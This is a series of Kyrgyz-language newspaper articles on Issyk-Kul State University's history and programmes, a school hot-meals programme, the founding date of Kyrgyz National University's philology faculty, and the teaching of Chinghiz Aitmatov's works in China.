Эл аралык долбоорлордогу дагы белгилей кетчү нерсе, жылдан-жылга мобилдүүлүк программаларынын саны өсүүдө. Мисалга алсак, ар бир окуу жылында Ерасмус Мундус программасынын алкагында ЫМУнун студенттери, профессордук-окутуучулук жана административдик курамы 1 айдан 36 айга чейин бакалавр, магистратура, докторантура жана профессордук-окутуучулук курам билим алуу, илимий изилдөө жана тажрыйба топтоп келүүгө мүмкүнчүлүк  алышууда жана ошондой эле Индия жана Кытайга да баруучулардын саны көбөйдү. Индиянын ITEC – илимий-техникалык кызматташуу программаларына 2012-2014-жылдары 40тан ашык окутуучулар квалификациясын жогорулатып келди, ал эми Кытай менен Конфуций институту менен келишимдин негизинде 25тен ашык окутуучу, студент, административдик кызматкерлер Урумчи, Пекин шаарларына жолдомо алышууда. Бүгүнкү күндө ЫМУда  Турция, Кытай, Казакстан, Россия өлкөлөрүнөн келген 19 чет элдик студенттер билим алууда. Эки же көп тараптуу байланыштардын, илимий жана билим берүү долбоорлорунун  өнүгүшү ЫМУнун эл аралык байланышында негизги баалуулук катары эсептелет. Бүгүнкү күндө К.Тыныстанов атындагы ЫМУ университеттер, институттар, илимий жана изилдөө борборлору жана чет өлкөлүк өнөктөштөр менен кызматташуунун ар кыл формаларындагы 77 макулдашууну ишке ашырып келет. Эл аралык байланыштар боюнча алдыга өнүгүү пландары иштелип чыккан. Алардын негизгилери төмөнкүлөр: студенттердин жана окутуучулардын академиялык мобилдүүлүк программасына катышуусун жогорулатуу. Эл аралык долбоорлорго катышуу менен тармактар боюнча маселелерди ишке ашыруу. Окуу жайдын башка ЖОЖдор менен байланышынын масштабын кеӊейтип, өнүктүрүү. Окутуучулардын квалификациясын жогорулатуу үчүн түрдүү проектилердин тренингдерине катыштыруу, Эл аралык конференцияларды, семинарларды жана тренингдерди байма-бай өткөрүү.

Сырттан окутуу же дистанттык окутуу — учурдун талабы

Сырттан окуган студенттерге К.Тыныстанов атындагы Ысык-Көл мамлекеттик университетинин Yзгүлтүксүз билим берүү борбору билим берет. Yзгүлтүксүз билим берүү борбору Пржевальск мамлекеттик педагогикалык институтунда 1967-жылы ачылган сырттан окутуу бөлүмүнүн базасында уюштурулуп, бүгүнкү күнгө чейин көптөгөн бүтүрүүчүлөрдүөз уясынан учуруп келүүдө. 2011-2012-окуу жылынан баштап ЫМУнун Окумуштуулар кеӊешинин чечими менен сырттан окутуу формасы «Yзгүлтүксүз билим берүү борбору» болуп кайрадан  уюштурулган. Бүгүнкү  күндө Yзгүлтүксүз билим берүү борбору 18 адистик  боюнча жогорку  билимдүү кадрларды даярдап чыгарууда. Ошондой эле 2012-жылдан баштап дистанттык технологияларын колдонуу менен окутуу үчүн 8 адистик боюнча адистерди даярдоого лицензиялар алынган. Бүгүнкү күндөҮзгүлтүксүз билим берүү борборунда эки миӊге жакын студенттер билим алууда.

Чарбасыз өнүгүү болбойт

Университеттин борбордук корпусунун,  жатакананын, «Толкун» маданий-эстетикалык борборунун айланасы корулуп, жагымдуу жагдайлар түзүлгөндүгү байкалып турат.

Ал эми окуу жайдын жатаканасы заманбап ремонттон өтүп, бөлмөлөрдүн дээрлик баардыгында эмеректер алмаштырылган. Жатакананын окуу залы жасалгаланып, студенттердин гигиенасын кароочу шарттар жөнгө салынган. Жатаканада студенттер үчүн атайын медициналык пункт иштеп, атайын жогорку квалификациялуу врач адистер даарылоо процессин жүргүзүшөт.

Окуу жайдын 75 жылдыгына карата студенттердин ден соолугун чыӊдоо, спорттук жетишкендиктерди бышыктоо үчүн спорт ордосу курулуп ишке берилди. Ошондой эле окуу жайдын тарыхый музейи ачылып, кызыктуу экспонаттар менен толукталып жатат. Интернет-класстары менен бирге жаӊы техникалык каражаттар менен жабдылган адистештирилген аудиториялардын көбөйүшү, замандын агымына жараша иш жүрүп жаткандыгынын белгиси десек болот.  Чындыгында окуу жай бардык тармактар боюнча өсүп-өнүгүп жаткандыгы “Эшигин көрүп төрүнөөт” дегендей, ар бир имараттагы аудиториялардын өзгөчө жасалгаланышы жана тазалык менен тартиптин айкалышып тургандыгынан эле байкалып турат.

Окуу жайдын кыскача тарыхы

Ушул жылы 13-июнда окуу жайдын ачылгандыгына карата 75 жылдык маараке болду. Тарыхына токтолсок, К.Тыныстанов атындагы Ысык-Көл мамлекеттик университети 1940-жылы 13-июнда Кыргыз ССРинин Эл комиссарлар советинин токтому менен эки жылдык Мугалимдер институту болуп, ошол кездеги Пржевальск шаарында ачылган. Улуу Ата Мекендик согуштун башталышына байланыштуу 1941-жылы Фрунзедеги педагогикалык институт  Пржевальск шаарына көчүрүлүп, бул жердеги мугалимдер институту менен кошулган. 1944-жылы Советтер Союзунун Баатыры Григорий Дмитров атындагы Пржевальск мугалимдер институту болуп аталган. СССР Министрлер Советинин 1953-жылдын 22-апрелиндеги чечими менен Пржевальск педагогикалык институту уюштурулган. Жаӊы статуска ээ болгон окуу жай Кыргызстан, өзгөчө Ысык-Көл жана Нарын аймактары үчүн педагог – адистерди даярдоо ишин жылдан-жылга жаӊы баскычка көтөрүп, республиканын эӊ алдыӊкы жогорку окуу жайларынын бири катары эсептелип, абройлуу институтка айланган. Ал эми 1988-1992-жылдары окуу жайда бир топ өзгөрүүлөр болгон. Тактап айтканда ошол учурда улуттук университеттин филиалынан, кайрадан институтка, андан университетке айлануу этабы жүргөн. Кыргызстандын эгемендүүлүккө жетиши менен 1992-жылы 18-декабрда окуу жайыбыз Мамлекеттик университет статусун алып, ага элибиздин тунгуч профессору Касым Тыныстановдун ысымы ыйгарылган.

Бүтүрүүчүлөр — биздин сыймыгыбыз

«Аккан арыктан суу агат» дегендей,  өткөн кылымда биздин окуу жайдан билим алып, талбаган эмгектери менен элдик адамдарга айланган  окумуштуулар Бүбүйна Орузбаева, Жаныбек Жээнбаев, Аманбек Карыпкуловдор элибиздин сыймыктуу академиктери болушту. Социалисттик эмгектин баатыры Көкөбай Мамбеталиев, республикада биринчи жана акыркы СССРдин Эл мугалими Жамангул Үтүров, Кыргыз Эл мугалими Жибек Өзүбекова, эмгек сиӊирген мугалимдер А.Ахматов, Ш.Шүкүрбаева, А.Кангелдиев жана Кыргызстандын мамлекеттик жана коомдук ишмерлери Жумагул Сааданбеков, Жанкороз Каныметов, Асылкүл Абдурехменова, Тилектеш Ишемкулов, Токон Мамытов, Жолболду Осмоналиев, Акылбек Жаныбеков, Талант Үсөнов сыяктуу көптөгөн бүтүрүүчүлөрү менен окуу жайдын жамааты сыймыктанышат. Буюрса кийинки муундун өкүлдөрүнөн эле экономика министри болуп иштеп жаткан Олег Панкратов сыяктуу өкмөттө иштеген көптөгөн бүтүрүүчүлөрү да бар. Ал эми жаш кезинен илимдин доктору болгон Назира Дүйшеева, Аида Абдыкеримова, илимдин кандидаттары болушкан Дөөлөт Аканов, Жолдош Токтакунов, Аман Такырбашев, Кубат Исабеков, Назгүл Мазекова, Келдибек Койлубаев сыяктуу ондогон илимпоз бүтүрүүчүлөрү илим үстүндөүзүрлүү эмгектенишүүдө.

Бүтүрүүчүлөр жумуш менен камсыздалат

К.Тыныстанов атындагы ЫМУда бүтүрүүчүлөрдү иш менен камсыз кылуу маселеси туура жолго коюлган. Тактап айтсак, 2008-жылдан бери бул багытта пландаштырылган иштер жүрүп жатат. Бүтүрүүчүлөрдү алдын ала ишке орноштуруу камын көрүү азыркы учурдагы окуу жайлардын негизги милдети болуп турат. Бул багытта көптөгөн долбоорлор менен иштөөнүн натыйжасында окуу жайдын бүтүрүүчүлөрүнүн 53, 5 % жылда иш менен камсыз болууда. Жылына аталган көрсөткүч өсүп-өнүгүп жатат. Акыркы жылдары Республикабыздагы банктар, «Кумтөр» компаниясы, «Мегаком» уюлдук компаниясы менен атайын келишимдер түзүлүп, жөндөмдүү студенттер кесиптик практикаларын өткөзүү менен бирге жумушка орношуу мүмкүнчүлүгүнө ээ болууда.

КУРСАГЫ ТОК БАЛАНЫН КӨӉҮЛҮ КУУНАК, ОКУУСУ ЖАКШЫ

$
0
0

2006-жылдан бери Кыргызстандын өкмөтү мектептерде балдарга тамак берүүгө каражат бөлүп келатат. Соӊку жылы эл аралык уюмдардын жардамы менен эки жүздөн ашык мектепте ысык тамак берүүгө жетишип калышты. БУУнун Дүйнөлүк азык-түлүк программасынын кызматкери, «Мектептерде тамак берүүнү оптималдаштыруу» программасынын өкүлү Нурбек Абубакировдун айтымында, мектепте ысык-тамак берүү балдардын билим алууга болгон укуктарын коргоону жакшыртууга олуттуу таасир көрсөтүп жатат.

- 2006-жылдан бери мамлекет тарабынан мектепте тамак берүүгө бала башына беш сомдон бөлүнүп баштаган. Кийин жети сомго көтөрүлүп, тоо жериндеги балдарга он сомдон каралган. Бул акчага мектептер булочка же сүттөгөн чай бере алышат. Биздин долбоордун максаты ошол мамлекет бөлгөн акчага мектептерде балдарга ысык тамак берүүгө жетишүү болуп саналат.

- Жети-он сомду ысык тамак бергенге кантип жеткирип атасыӊар?

- Биздин долбоорго кирген мектептер ушул акчага ысык тамак берүүгө жетише башташты. Сөзсүз түрдө күн сайын эмес, жумасына эки-үч жолу берсе болорун көрүп жатабыз.

- Сиздердин долбоор аркылуу канча мектепке ысык тамак берүүгө мүмкүн болуп жатат?

- Оптималдаштыруу долбоору 2013-жылы башталган. Азыркы күндө Кыргызстан боюнча 261 мектепте ысык тамак бериле баштады. 2017-жылга чейин дагы жүздөй мектеп кошулат. Ошондо Кыргызстандын мектептеринин 15-20% ушул долбоорго кирген болот.

- Мектептерде ысык тамак берүүнүн окуучулардын окуусунун сапатын жакшыртууга кандай таасири тийип жатканын изилдеп-иликтеп көргөндөр барбы?

- Кыргызстан боюнча изилдөөлөр жүргөн эмес. Бирок ата-энелердин жана мектеп жетекчилеринин айтканына таянсак, ысык тамак ичкен балдардын курсагы ток, көӊүлдөрү куунак болуп, сабактарга катышуусу активдүү болуп жатат. Ошол эле учурда сабакты калтырган балдардын саны да кескин азаят экен. Өзгөчө кыш келгенде балдар суук тийип көп ооруйт эмеспи, ал эми мектепте ысык тамак ичип жүргөн балдар оорушпайт жана ооруган балдардын саны да азайып жатканын мектеп директорлору айтышууда.

Мектепте ысык тамак берүүнүн балдардын саламаттыгын чындоодо мааниси чоӊ. Балдар күнүгө керектей турган калория же азык-түлүктөрдөгү пайдалуу заттардын 30 пайызын мектептеги тамактануудан алышы керек экен. Анткени балдар убактысынын көбүн мектепте өткөрүшөт. Ошондуктан мектепте сапаттуу тамак-аштын болгонунун мааниси абдан чоӊ. Балдар сабак окуганда жана ары-бери чуркаганда көп энергия коротушат, анын ордун мектепте толуктап туруу керек.

Бизде изилдөө болбогон менен Индия жана башка өлкөлөрдө тийиштүү изилдөөлөр болгонун айта кетейин. Ошондой изилдөөлөр мектепте берилген тамак-аштын балдардын окуусунун натыйжалуу болушуна таасири абдан чоӊ экенин көрсөткөн.

- Коӊшулаш Казакстан, Өзбекстан же Россиядагы мектептерде балдарга тамак берүүнүн Кыргызстан үчүн алгылыктуу тажрыйбасы бар бекен?

- Казакстанда, Тажикстанда жана Россияда биздин мамлекетке окшоп, балдарга мектепте тамак берүүгө анча көӊүл бурбайт, кам көрбөйт. Бул иш бүтүндөй ата-энелерге жүктөлгөн.

- Өзүн курчаган мамлекеттер арасында Кыргызстан өзгөчөлөнүп окуучу балдарга мектепте тамак берип, кээ бир учурда ысык тамак берүүгө жетишип жатканына эл аралык коомчулуктан берген баасы кандай болуп жатат?

- Сентябрь айында биз социалдык колдоо жана тамак-аш боюнча Россияда болгон бир форумга барып келдик. Биз менен кошо билим берүү министринин орун басары да кошо барып, мектептерде тамак берүү иштери кандай колго алынганын айтып маалымат берди. Көп өлкөлөрдүн өкүлдөрү келип, өздөрүнүн тажрыйбасын бөлүштү.

Кыргызстандын тажрыйбасы аябай эле жакшы баага татыктуу болду. Анткени, мамлекет колунан келишинче бул ишке өзүнүн колдоосун көрсөтүп жатат. Башка өнүккөн өлкөлөрдө балдарды мектепте тамактандырууга бөлүнгөн акчалардын көлөмү чоӊ. Жети сом-он сом дүйнөлүк масштабда арзыбаган акча болсо да бир топ ишке жарап жатат, ошондой эле ата-энелер менен тыгыз иш жүрүүдө. Ата-энелер да өздөрү балдарды мектепте тамактандырууга күнүнөүч-беш сомдон бөлүп жатышат.

Айыл өкмөттөрүнүн да колдоосу жакшы экенин айта кетишибиз керек. Мектептердин инфраструктурасын өнүктүрүү боюнча суу жеткирүү, канализация куруу, ремонт сыяктуу көп иштерди айыл өкмөттөрүөздөрү бүткөрүүдө. Бул долбоорго колдоо көп тараптуу болуп жаткан үчүн ийгиликтүү ишке ашууда.

 

Маектешкен Кубат Чекиров


БИЛИМ МЕНЕН ИЛИМДИН БАШАТЫ же тарыхты тактап коелу

$
0
0

Ж.Баласагын атындагы Кыргыз улуттук университетинин кыргыз филологиясы факультетинин күн кечирип, өз ишмердигин жолго коюп келаткандыгына быйыл туура 90  жыл болду.

Албетте, аталган факультеттин 90 жылдык тарыхы жөнүндө сөз болгондо өзүнөн-өзү окуу жайыбыздын тарыхы да кошо каралып, бир бүтүн түшүнүк катары кабылданат. Себеби бул аталган факультет, анын ичинде кыргыз тил илими, кыргыз адабияты кафедралары биздин биринчи тунгуч окуу жайыбыз ачылган күндөн,  т.а., 1925-жылдан баштап кыргыз тили жана адабияты боюнча иш жүргүзгөн «аксакал» факультеттердин биринен экенин азыркы күндө көпчүлүк адамдар биле беришпейт. Өзүнүн алгачкы бүтүрүүчүлөрүн 1929-1930-жылдары өз «уясынан» учурган бул окуу жайдын тарыхы айрым жетекчилер жаӊылыш санагандай 1932-жылдан эмес, 1925-жылдын 25-октябрынан башталат. Болбосо, «уй өз мурдун сасык деп эсептегендей» эле биз да 1925-жылдан 1932-жылга чейинки мезгил-тарыхты эмне үчүн өзүбүздөн оолактатып, жалпы жыл эсебинен сызып салышыбыз керек? Окуу жайыбыз ал жылдарда кандай статуска (Жогорку, орто окуу жайы дегидей) ээ болуп иштебесин, ал биздин кечээки баскан жолубуз, баяндуу тарыхыбыз эмеспи! «Созулма үндүүлөрдү соебузбу?» деп бир тилчи–окумуштуу агайыбыз өз учурунда  жалпы коомчулукка кайрылып маселе койгондой, биз да ошол мезгилдеги (1925-30-жылдардагы – Б.Б.) Кыргыз агартуу институту, Кыргыз борбордук педагогикалык техникуму болуп турган учурдагы окуу жайыбыздын эӊ маанилүү, эӊ машакаттуу жылдарын эми азыр кимге ыроолоп, кайсыл окуу жайына күчтөп жармаштырабыз? Ошондуктан «Ала кушту атынан айтып», өз бактыбызга, өткөн тарыхыбызга өрөскөл мамиле кылбасак, «ала койду бөлө кыркпасак» биз алдыга жылып, элге да жүзүбүз жарык болмокчу. Эми өткөн тарыхка, 90 жылдыктын чоо-жайына келели.

Кыргыз эли 1924-жылы Түркстан Автономиялуу Республикасынын курамынан өзүнчө Кара-кыргыз Автономиялуу областы болуп бөлүнүп чыккан соӊ, эӊ алды улуттук тил, адабият, оозеки чыгармачылык, жалпы эле маданият тармагында иштиктүү аракеттер көрүлө баштаган. Мындан аркы билим-илим иштеринин жаӊы коомдо өнүп-өрчүп кетиши кадрларга, т.а., сабаттуу адис-мугалимдерге байланыштуу болорун, ал үчүн кыргыздарга окшогон чачкын жайгашкан көчмөн элдердин башын курап, өзүнчө жогорку окуу жайларын ачып, жергиликтүү элдин өзүнөн адис-кадр даярдоо маселеси башкы зарылдык катары 1924-жылы Түркстан АССР Борбордук аткаруу комитетинин II Пленумунда каралып, анда төмөнкүдөй мазмундагы чечим кабыл алынган: «Аз сандагы түрк элдери үчүн мектептер тармагын өрчүтүү жана ошол мектептерге мугалимдерди даярдоо маанилүү да, кечиктирилгис да иш болгон себептүү, Пленум кара-кыргыздар жана тажиктер үчүн агартуу институттарын ачуу зарыл деп эсептейт». Ошол эле 1924-жылы Кара-кыргыз автономиялуу областтык билим берүү бөлүмү 17-декабрда курамы: Токбаев, Арабаев, Баишов, Поливанов, Буруй ж.б. катышкан кезектеги жыйналышын өткөрүп, анда жакынкы күндөрдө Кыргыз агартуу институтун ачуу жөнүндөөзүнүн №2 Токтомун кабыл алат. Бул иш-чара алгачкы жасалган кадам катары каралгандыктан, аны андан ары мыйзамдаштырып чечүү ниети менен Кара-кыргыз Автономиялуу областынын элге билим берүү бөлүмүнүн коллегиясы жыйналыш чакырып, ага большевиктердин областтык партия комитетинен – Төрөкул Айтматов, Кыргыз агартуу  институтунан өкүл – Петр Кузьмич Юдахин, Союз Кошчудан  эч ким катышкан эмес, Пишпек округдук комитетинин инспектору Майрыков, Каракол округунан – Беисов, Жалал-Абад округунан – Чолпонкуловдор расмий өкүл катары катышса, Коллегия мүчөлөрү: Каримов, Арабаев, Баишев, Шептухин, Буруй, Громовалар болушуп 1925-жылы 30-майда «Пишпек шаарында Кыргыз агартуу институтун ачуу максатка ылайык деп табылсын» деген мазмундагы №15 Токтомун кабыл алып, аны Кара-Кыргыз Автономиялуу областынын Советтеринин аткаруу комитетинин Президиумунун кеӊешмесине жолдошот. Ал эми ошол эле 1925-жылы 17-июнда Президиум мүчөлөрү: А.Орозбеков, Ишбулатов, Жакыпбаев ж.б. катышкан кеӊешме А.Орозбековдун төрагалыгы (катчысы Ишбулатов) астында өтөт. Анда, негизинен, директор П.К.Юдахиндин (П.К.Юдахин мурда эле, т.а., Түркстан АССР болуп, Кыргыздар анын курамында турган 1924-жылы эле Ташкенде Кыргыз агартуу институтун ачуу маселеси каралып, П.К.Юдахин анын директору болуп дайындалган болчу – Б.Б.) расмий билдирүүсүнөн улам областтык билим берүү бөлүмүнүн Кыргыз агартуу институтун ачуу жөнүндөгү докладдык каты маселенин чордонун түзүп, Советтердин Аткаруу комитетинин Президиуму областтык билим берүү бөлүмүнүн сунушун колдоп, «Кыргыз агартуу институтун ачуу максатка ылайык келет» деген өзүнүн №29 Токтомун кабыл алат. Жыйналышты мыйзамдаштырып кагаз бетине түшүргөн Областтык аткаруу комитетинин техникалык катчысы Вагапов болгон. Мына ушундай көптөгөн уюштуруу иштеринен кийин гана 1925-жылы 25-октябрда Бишкек шаарында өз ишин баштаган Кыргыз агартуу институту жөнүндө айтсак, бул тунгуч улуттук окуу жайыбызга ошол жылы Алма-Ата, Ташкент шаарларындагы казак, кыргыз эл агартуу институттарынын даярдоо класстарында билим алып жатышкан 60 окуучу Бишкекке которулуп, алардын үстүнө дагы 80 окуучу жаӊы кабыл алынуу менен баары 140 окуучусу бар тунгуч улуттук окуу жайыбыз – Кыргыз агартуу институту аталып, алгачкы кадамын шилтеген. Бул окуу жайдын алгачкы мугалимдери катары: П.К.Юдахин, Б.Данияров, Шамгунов, С.Нааматов, У.Абдукаимов, А.Шабданов ж.б. эмгектенишкен. Окуу жайдын биринчи директору П.К.Юдахин, окуу бөлүмүнүн башчысы Б.Данияров болгон.

П.К.Юдахин Кыргыз билим берүү бюросунун 1927-жылы 4-октябрындагы №2 токтомунун негизинде Агартуу институтунун бардык класстарын жаӊы латын алфавитине өткөрөт. Ушул эле жылы 12-ноябрдан баштап мурдагы эки даярдоо классынын үстүнө дагы эки класс кошуп, билими өп-чап кыргыз балдарын  окутууну күчөткөн. Ушул жылдан баштап Кыргыз агартуу институтунун алдында такай иштөөчү (15-майдан 15-сентябрга чейин) айылдык мугалимдерди кайра даярдоо курсун ачууга жетишип, кийин ал курс республикалык мугалимдердин билимин өркүндөтүүчү институтка айланган. Бул аталгандардан башка да көп жаӊы саамалыктардын кыргыз тунгуч окуу жайында жаралып, анын андан ары кеӊири кулач жайышына демилгечи болуп көп күч жумшагандардын көч башында улуу устат, чоӊ уюштуруучу-жетекчи, окумуштуу катары П.К.Юдахин менен Б.Данияров турган.» Бул эки улуу инсанга бүгүнкү Кыргыз улуттук университети көп карыздар экенин али ушул күнгө чейин билсе да билмексен болуп келатышат.

Андан бери көп мезгил өттү. Окуу жайыбыз ара-чолодо 3-4-жыл педтехникум статусу менен да иштеди. Кыргыз АССР Эл Комиссарлар Советинин 1932-жыл 13-январдагы кабыл алган Токтомунун негизинде Фрунзе шаарында мурунку Борбордук педтехникумдун базасында Кыргыз мамлекеттик педагогикалык институту ачылат да, ал кийин 1951-жылы 30-майда Кыргыз мамлекеттик университетине айланат. 1932-жылы пединститут кезинде болгону төрт факультет болсо, бүгүнкү күндө окуу жайыбыздын өрүшү кеӊейип, өзүнөн көп мыкты кадрларды өстүрүп чыгарууда.

Б.Баймырзаев,

КУУнун кыргыз адабияты

кафедрасынын доценти

АЙТМАТОВДУ КЫТАЙДА КАНДАЙ ОКУШАТ?

$
0
0

Кытайда мектептерде ар жылы Айтматовдун туулган күнү атайын маанилүү иш-чаралар менен белгиленет. Алгачкы жылдары Кызылсууда, андан кийин Үрүмчүдө студенттердин чогулушу башталган, азыр бүт мамлекетке жайылтылды. Ар жылкы иш-чаранын арналуу темасы бар. Ар жылы 12-декабрь күнү Айтматовдун сүрөтү түшүрүлгөн календарлар чыгарылат, залкардын сүрөттөрү белекке берилет.

20-кылымдын 60-жылдарында совет социалисттик адабиятынын атактуу чыгармалары орус тилинен кытай тилине которулуп жарык көрө баштаган. 1961-жылы Ли Гаӊ аттуу кытай котормочусу «Жамийланы» которуп, «Дүйнө адабияты» журналынын 10-санында жарыялаган. Бирок каргашалуу «маданий төӊкөрүш» жана кытай-совет байланышынын начарлап кетүүсү аралыкта 12 жыл Айтматовдун чыгармаларын кытай тилине которуп жарыялоодо үзүлүш болгон. 1973-жылы Сав Янжоӊ которгон «Ак кеме» совет коомундагы караӊгылыктарды ачып берүүчү «тескери окуулук» катары айрым китеп болуп ички жактан таратылган. Азырга чейин Чыӊгыз Айтматовдун бардык чыгармалары кытай тилине которулуп, 29 башка китеп болуп чыккан.

Ал эми Кытайдагы аз сандуу улуттардан алгачкылардан болуп уйгурлар 1981-жылы «Ак кемени» кытай тилинен которуп, Пекин улуттар басмасынан китепче кылып окурмандарга сунган. 1984-жылы «Жамийла», «Кызыл жоолук делбирим», «Биринчи мугалим», «Жер энени» «Айтматов повесттеринен тандалма» аттуу китеп кылып чыгарган. Ошондон баштап уйгур коомчулугунда Айтматовдун чыгармачылыгына кызыгуу оожалган. Жазуучунун дээрлик бардык чыгармалары уйгур тилине которулуп бүттү. 2011-жылы Айтматов чыгармаларынын уйгур тилиндеги сегиз томдугу басмадан чыгып, 2014-жылы Англияда өткөн эл аралык китеп фестивалында баш байгени жеӊип алган. Уйгур тилинде чыккан китебинин түрү 18ге жетет.

Кытай моӊгулдары 1983-жылы Айтматовдун чыгармаларынын I томун, 1985-жылы II томун чыгарышкан. Жогорку окуу жайларда окутууга, жалпы эле монгул тилдүү окурмандарга жайылтууга көп күч жумшап келишет.

1985-жылы «Ак кеме», «Кылым карытаар бир күн» менен «Гүлсаратты» Кызылсуу кыргыз басмасы чыгарганга чейин кыргыз окурмандар кытай тилиндеги, көпчүлүгү уйгур тилиндеги басылышын издеп окуп келишкен. Айтматовду кытай кыргыздарына кеӊири тааныштырууга окумуштуу Макелек Өмүрбай данакер болгон, 1988-жылы кытай сынчыларынын Айтматов чыгармаларына берген бааларын жыйып, кыргыз тилине которуп, «Алп изинен» аттуу китеп чыгарып, түшүнүүнү ого бетер тереӊдеткен.

Кытай тилиндеги изилдөөлөр     Айтматовдун чыгармаларынын көркөмдүк өзгөчөлүгүн жана идеяларын иликтешет, кытай жазуучуларынын чыгармаларын салыштыра изилдешет, б.а. Айтматовдун кытай жазуучуларына көрсөткөн таасирин ачып көрсөтүшөт.

Окумуштуу агабыз Макелек Өмүрбайдын «Манас жана Чыӊгыз» деген илимий эмгеги Кыргызстанда жарык көрдү. Андан башка жаш изилдөөчү Мамбетжүсүп Амантур уулунун «Адамзаттын Айтматову, кыргыздын Чыӊгызы» деген илимий эмгеги кыргыз тилинде жарык көрдү.

Рухий ак кеме

Айтматов чыгармаларын элге жайылтуу, жаш муундарга сиӊирүү жана анын рухуна мураскердик кылуунун дагы бир аргасы – мектептерде окутуу. Бул иш 1989-жылы толук ортонун кыргызча адабият окуулуктарына киргизүүдөн башталган. Он жылга жуук «Атадан калган туяк» деген бир гана аӊгемеси окутулуп келген. 1998-жылы кыргызча окуулуктарды кайрадан түзгөндө толуксуздун окуулуктарына «Атадан калган туяк», «Манас атанын ак кар көк музу», «Ак кеме» деген үч чыгармасы, толук ортонун окуулугуна «Кылым карытаар бир күн» романынан үзүндү («Дөнөн куштун аӊгемеси» деген ат менен) киргизилген.

Жогору окуу жайларында, 1980-жылдардын ортолорунан тарта эле филология адистигинин чет эл адабияты окуулуктарына Айтматовдун өмүр жолу, чыгармачылык ийгиликтери, чыгармаларындагы көркөм бийиктик жана башкалар кенен иликтөөгө алынган маалыматтар киргизилүү менен бирге «Кылым карытаар бир күн», «Ак кеме», «Жамийла», «Гүлсарат», «Кыямат», «Биринчи мугалим», «Деӊиз бойлой жорткон Ала-Дөбөттөр» көп тилдерде студенттерге окутула баштаган.

Окуулук беттеринде

 Баштоочтун кыргызча «эне тил» окуулуктарында: «Чыӊгыздын балалык кези» (Райкан Шүкүрбековдун макаласы боюнча), «Туӊгуч калем акым» (Айтматовдун «Чоӊ энем жана тунгуч калем акым» аттуу эргимесинин негизинде).

Толуксуз орто мектептердин кыргызча «тил-адабият» окуулуктарында «Атадан калган туяк», «Жаныбарым Гүлсары», «Турмуш жана эстемелер» (адабияттын ролу жөнүндө сүйлөгөн сөзү), «Адабияттын жаш атуулдарына»; «Кылым карытаар бир күн» (романдан үзүндү — «Дөнөн куштун аӊгемеси»), доктор Лайли Үкүбаеванын «Кыргыз элдик фольклору жана Чыӊгыз Айтматов» деген макаласы.

Толук ортонун кыргызча тил, адабият окуулуктарында «Залкарлардын маеги» («Аскада калган аӊчынын ыйынан» үзүндү), «Токой төш планетасына сапар» («Кылым карытаар бир күн» романынан үзүндү), «Ак кеме» (сабактан тышкары окуу), тандалмалуу окуулук «Ал океан сындуу «Манастын» миллион сабын жат билген»; (2) Макелек Өмүрбай. «Чыӊгыз Айтматовду тогуз жолу зыярат»; Жу Ёки. «Манас» мен үчүн орошон мааниге ээ» (автордун Чыӊгыз Айтматов менен маегинен).

Уйгурлардын толуксуз 9-жылдык 1-бөлүк «тил-адабият» окуулугунда «Уулу менен кездешүү» деген аӊгемеси, толук ортонун милдеттүү окуулук — IVде «Деӊиз бойлой жорткон Ала-Дөбөт» повестинен үзүндү окутулат.

Казактардын толуксуз 8 жылдык 2 бөлүк «тил, адабият» окуулугунда «Ауэзов тууралуу сөз» деген макаласы; толук ортодо «Алгы сөз» (М.Ауэзовдун «Кыйла заман» аттуу китебине жазган баш сөзү) окутулат.

 Адабий алптар сабында

 Кытайда жогорку окуу жай филология кесибинин чет эл адабияты окуулуктары ар кайсы материктерге карай түрлөргө бөлүп түзүлөт. Анын ичинде евро-америка бөлүгүндө 20-кылымдын кийинки мезгилдик реализм адабиятынын көрүнүктүүөкүлү катары Нобель сыйлыгынын ээлери Э.Хемингуэй, Б.Пастернак, канадалык жазуучу Совл Болу менен катар совет-орусия реализм адабиятынын эӊ көрүнүктүүөкүлү, кыргыз жазуучу Чыӊгыз Айтматовдун чыгармачылыгы бүтүн күндүзгү окуу түзүмүндө окутулат. Атайын түзүлгөн окуулуктун толукталып, оӊдолгон 7-чыгарылышы 2015-жылы жарык көрдү. Анда Айтматовдун өмүр жолунан маалымат берилип, чыгармачылыгын мындай үч баскычка бөлүп изилдеген.

Биринчиси – изденүүдөн бышылып жетилүүгө чейин (20-к. 50-60-ж). Мында «Жамийланы» Айтматов чыгармачылыгындагы доор бөлгүч кубулуш деп карап, ошол жөнүндө көбүрөөк токтолгон. Ал эми «Гүлсаратты» Айтматов чыгармачылыгы бышкандыгынын белгиси катары санап, андагы улуттук маданият, Гүлсары жана Танабай образын жаратуудагы жетишкендиктер жөнүндө кеӊири токтолгон. Албетте, ушул 20 жыл ичинде жазган повесттеринин ар бирине токтолбой өтпөгөн.

Экинчиси – көркөм чыгармачылыктын жаӊы бет алышы (20-к. 70-жылдары). «Ак кемени» белги кылган бул доорду Айтматов чыгармачылыгындагы жаӊы бет алыш деп карап, «Ак кеме» тууралуу өтө кеӊири ары ичкерилей изилдөө жүргүзүлгөн, асыресе, чыгармачылыгына элдик аӊыз-уламыштарды жуурулуштуруп жеӊишке жетүүдөй чеберчилигин турактандырып, ошол доордо совет адабиятында эӊ алгачкылардан болуп «Ак кеме» менен сынчыл реализмге жол салган баштоок жазуучу деп баалаган. Андан башка «Деӊиз бойлой жорткон Ала-Дөбөт», «Кайрылып куштар келгенче» деген чыгармалар жөнүндө талдоолор жүргүзүлгөн. Үчүнчү мезгил – сюжет, линия жана туюнтуу ыкмалары көп түрдүүлөшкөн универсал өнүгүү доору (20-к.80-ж.-90-ж).

21-кылымда жаӊыдан түзүлгөн чет эл адабияты (евро-америка бөлүгү) окуулуктарында Хемингуэй, Пастернак, Айтматов, Совл Болувдан турган төрт эле жазуучу аталган тизмеге кирген. Мындан эки түрдүүөзгөчөлүктү байкоо кыйын эмес, бири, мурдагы окуулуктардагы сегиз «алптан” тек Айтматов менен Хемингуэй гана өз ордун сактап калган.

Кытайдагы жогорку окуу жайлардын филология факультеттеринин баарында Айтматовдун чыгармачылыгы окуп-үйрөнүлөт.

2011-жылдан баштап мамлекеттик агартуу министрлигинин макулдугу менен Шинжаӊ педагогикалык университети филология факультетинде кыргыз адабияты боюнча толук курска ар жылы бирден класс окуучу кабылданып келет. 2015-жылы октябрдын аяк ченинде «Айтматов таануу» аттуу окуулук түзүлүп басмадан чыкты. 2016-жылы сентябрдан баштап расмий окутула баштайт. Бул кытай мамлекетинде жогору окуу жайларында айтматов таанууга багытталган эӊ алгачкы арналуу окуулук.

